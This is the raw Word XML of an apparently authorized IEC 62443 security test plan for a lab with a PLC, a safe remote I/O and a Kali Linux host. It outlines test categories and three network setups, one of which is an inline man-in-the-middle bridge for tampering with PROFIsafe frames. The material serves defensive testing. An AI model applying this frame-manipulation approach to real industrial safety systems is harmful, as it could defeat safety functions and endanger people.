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6D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808542F" w14:textId="08E0B7D6" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Requirement &amp; </w:t>
      </w:r>
      <w:r w:rsidR="00A610E2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping: Mapping </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from the EU Machinery Regulation to the IEC 62443-4-2 Component Requirement (CR). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62926251" w14:textId="426F058B" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assets &amp; STRIDE: Evaluate identified Target Assets and</w:t>
      </w:r>
      <w:r w:rsidR="006A54D4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A54D4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STRIDE (</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="006A54D4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Are they plausible for this specific device and requirement? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2B610" w14:textId="13EFF358" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A28653" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D081344" w14:textId="03DEEB92" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Based on the validated Security Functions and Gaps, derive concrete test scenarios to verify the mitigations or prove the gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7EDF1" w14:textId="19FFF82A" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-1 Categorization (SVV): Assign each test to the correct SVV category:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35F769" w14:textId="00B389C1" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-1 (Requirements-based Testing): Verifying functional implementation in normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67614165" w14:textId="13CDE81E" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-2 (Threat Mitigation Testing): Verifying the effectiveness of countermeasures under attack/fault conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916C01F" w14:textId="255DB632" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-3 (Vulnerability Testing): Searching for known vulnerabilities or open attack surface (e.g., Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5257A" w14:textId="465EB6F1" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-4 (Penetration Testing): Active exploitation or protocol manipulation (e.g., Scapy, Fuzzing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B8659" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092DD3AF" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3: Two-Level Test Catalog Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EA1C3" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate the final test catalog entries for the planned tests. Each test must be structured in two levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383090BB" w14:textId="3299928D" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1: Abstract Test Scenario (Product-neutral). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D1613" w14:textId="489805BC" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="00901B8F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Must include: Test Case ID, Traceability (RQ -&gt; CR -&gt; Asset), Target Threat, SVV Category, Test Objective, Abstract Test Steps, and strict Pass/Fail Criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB49CF5" w14:textId="0B20E753" w:rsidR="00106294" w:rsidRPr="006D5B99" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2: Concrete Test Execution (Specific to my test environment). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CABC10" w14:textId="0499D971" w:rsidR="004117CC" w:rsidRPr="006D5B99" w:rsidRDefault="00106294" w:rsidP="000B7BA2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Must include: Referenced Test Case ID, Hardware/Network Setup (Kali, </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali 192.168.0.80 (Port 3)</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Target IPs), Concrete Tools (Nmap, Wireshark, Scapy, etc.), Specific Commands/Scripts to be executed, and placeholders for the Result and Evidence (e.g., PCAP, XML logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CAB71" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4802C7CA" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F05CECD" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDE0D1D" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBACA6F" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BE6096" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00111A72" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AC8CE4" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110A0ADE" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119B83FA" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E613227" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CEB249" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578B1246" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214B8945" w14:textId="39824D21" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00043484">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NV1</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Direct access (IP-based): Kali resp. the laptop communicate as a regular participant directly through the switch with SRIO and/or PLC (normal switching/routing). No extension needed. Covers all IoT-Core/HTTP-based tests as well as any test where Kali itself acts as a (unauthorized) communication partner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DDE98A" w14:textId="56D5B338" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00043484">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NV2</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive tap (mirror/SPAN): For traffic that is NOT addressed to Kali (e.g. the PROFINET/PROFIsafe cyclic traffic between PLC and SRIO), this traffic must be made visible to Kali. Prerequisite: switch 192.168.0.91 supports a mirror/SPAN function (mirror ports 1+2 </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3)</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verify this in the switch management interface before testing. IMPORTANT: ARP spoofing does NOT work here, since PROFINET/PROFIsafe is not an IP protocol (EtherType 0x8892) and devices identify each other via DCP/MAC addresses rather than ARP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01554C4C" w14:textId="59106D10" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00043484">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NV3</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inline bridge (active MITM): For tests that require genuinely suppressing/replacing frames in real time (e.g. taking over the consecutive number, TC-RQ001-04), Kali must be physically inserted between SRIO and the switch: disconnect the SRIO cable from switch port 2 and connect it instead to Kali's internal/onboard network card; plug the USB3 Gigabit dongle (previously Kali↔switch) into switch port 2. Kali then acts transparently as a Linux bridge („ip link … type bridge“) with an optional NFQUEUE/ebtables hook to selectively manipulate individual frames before forwarding. This variant is the only notable hardware extension</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it needs no additional device, since it reuses the laptop's existing second network interface (onboard NIC) together with the already-available USB dongle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF125FF" w14:textId="77777777" w:rsidR="00043484" w:rsidRPr="006D5B99" w:rsidRDefault="00043484" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5AC76E" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE29558" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59685C09" w14:textId="77777777" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:t>USB3-zu-Gigabit-Ethernet-Dongle von kali zu switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EE6D4" w14:textId="77777777" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:t xml:space="preserve">switch 192.168.0.91, eine sps 192.168.0.1, das safe remote i/o 192.168.0.2, den kali linux rechner mit 192.168.0.80 und meinen firmenlaptop mit 192.168.0.7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E42EE" w14:textId="77777777" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:t>sps ist mit port1 ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6E41D" w14:textId="77777777" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:t xml:space="preserve">safe remote i/o ist mit port2, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FBD02" w14:textId="5615BBEA" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:t>kali-rechner mit port3 und laptop mit port4 vom switch verbunden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222B33D" w14:textId="77777777" w:rsidR="00434030" w:rsidRPr="006D5B99" w:rsidRDefault="00434030" w:rsidP="00434030">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5BE3E1" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FF141D" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0970326F" w14:textId="77777777" w:rsidR="00F234B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F234B7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6F8D3F" w14:textId="77777777" w:rsidR="00F234B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F234B7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE1E1A4" w14:textId="77777777" w:rsidR="00F234B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F234B7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297A94AC" w14:textId="77777777" w:rsidR="00F234B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F234B7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E24AFB1" w14:textId="77777777" w:rsidR="00F234B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F234B7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F478009" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DE8BB8" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26436A41" w14:textId="77777777" w:rsidR="0047270E" w:rsidRPr="006D5B99" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090CB1CC" w14:textId="0F7DE990" w:rsidR="00C1714F" w:rsidRPr="006D5B99" w:rsidRDefault="00C1714F" w:rsidP="00F51953">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E8EAE" w14:textId="11848689" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="00FF7917" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
